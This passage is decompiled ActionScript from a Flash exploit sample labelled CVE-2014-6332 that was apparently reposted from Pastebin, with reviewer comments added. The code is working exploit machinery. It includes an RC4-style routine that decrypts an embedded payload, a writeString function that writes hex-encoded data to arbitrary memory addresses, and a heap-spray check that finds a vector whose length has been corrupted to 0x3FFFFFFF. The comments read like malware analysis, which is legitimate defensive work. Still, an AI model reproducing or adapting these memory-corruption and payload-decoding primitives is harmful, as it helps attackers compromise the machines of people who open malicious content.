_local3 = this.rc4_crypt(_arg2, _arg1, _local4);
return (_local3);
}
// XORs the first _arg3 bytes of _arg2 with a keystream generated from _arg1
// and returns the result as a new ByteArray.
//
// The loop has the shape of RC4's output-generation phase (increment i, add
// S[i] to j, swap, emit S[(S[i]+S[j]) mod 256]). No key-scheduling loop is
// visible, so _arg1 is used directly as the 256-entry state table.
// NOTE(review): presumably the embedded key asset already holds a scheduled
// state rather than a raw key - confirm against the asset bytes before trying
// to decode a captured "shadow.jpg" with a stock RC4 implementation.
// Side effect: _arg1 is permuted in place.
public function rc4_crypt(_arg1:ByteArray, _arg2:ByteArray, _arg3:uint):ByteArray{
var _local4:int;
var _local5:int;
var _local6:int;
var _local7:uint;
var _local8:uint;
var _local9:ByteArray = new ByteArray();
while (_local7 < _arg3) {
_local4 = ((_local4 + 1) % 0x0100);
_local5 = ((_local5 + _arg1[_local4]) % 0x0100);
// Swap state[_local4] and state[_local5].
_local8 = _arg1[_local4];
_arg1[_local4] = _arg1[_local5];
_arg1[_local5] = _local8;
_local6 = ((_arg1[_local4] + _arg1[_local5]) % 0x0100);
_local9[_local7] = (_arg2[_local7] ^ _arg1[_local6]);
_local7++;
};
return (_local9);
}
// Decodes a hexadecimal string into a ByteArray, two characters per byte.
// There is no validation: for an odd-length input the last iteration parses a
// single character, and non-hex characters are passed to parseInt as they are.
private function HexString2ByteArray(_arg1:String):ByteArray{
var _local2:String;
var _local3:uint = _arg1.length;
var _local4:uint;
var _local5:ByteArray = new ByteArray();
_local5.endian = Endian.LITTLE_ENDIAN;
while (_local4 < _local3) {
_local2 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1)));
_local5.writeByte(parseInt(_local2, 16));
_local4 = (_local4 + 2);
};
return (_local5);
}
// Decodes the hex string _arg2 and writes it, four bytes at a time, through
// writeUnsignedInt starting at address _arg1. Each group of four decoded bytes
// is combined with the first byte as the most significant one. Returns the
// address just past the last word written.
// If the decoded length is not a multiple of four, the final group reads past
// the end of the decoded array.
private function writeString(_arg1:int, _arg2:String):int{
var _local3:int;
var _local4:int;
var _local5:int;
var _local6:ByteArray = this.HexString2ByteArray(_arg2);
// _arg2.length / 2 is the number of decoded bytes.
while (_local3 < (_arg2.length / 2)) {
_local5 = ((((_local6[_local3] * 16777216) + (_local6[(_local3 + 1)] * 65536)) + (_local6[(_local3 + 2)] * 0x0100)) + _local6[(_local3 + 3)]);
_local3 = (_local3 + 4);
this.writeUnsignedInt((_arg1 + (_local4 * 4)), _local5);
_local4++;
};
return ((_arg1 + (_local4 * 4)));
}
// Scans the vtObj20W pool for a vector whose length is exactly 1073741823
// (0x3FFFFFFF), the value func_step2 writes just before calling this. On a
// match it stores the index in changedPropertyObjIndex and returns true;
// otherwise it returns false and func_step2 stops.
private function checkProperty():Boolean{
var _local1:int;
while (_local1 < this.heapSprayLenByEnv20W) {
if (this.vtObj20W[_local1].length == 1073741823){
break;
};
_local1++;
};
if (_local1 == this.heapSprayLenByEnv20W){
return (false);
};
this.changedPropertyObjIndex = _local1;
return (true);
}

}
}//package

// Helper class with no behaviour: the constructor is empty and therundata
// ignores its three arguments and returns an unassigned uint (0). flappyMan
// creates one instance in its constructor and never uses it in this listing.
// NOTE(review): likely a leftover from an earlier variant of the sample.
class theoutobj {

public function theoutobj(){
}
public function therundata(_arg1:uint, _arg2:uint, _arg3:uint):uint{
var _local4:uint;
return (_local4);
}

}

Sursa: Exploit.SWF.CVE-2014-6332 - Pastebin.com
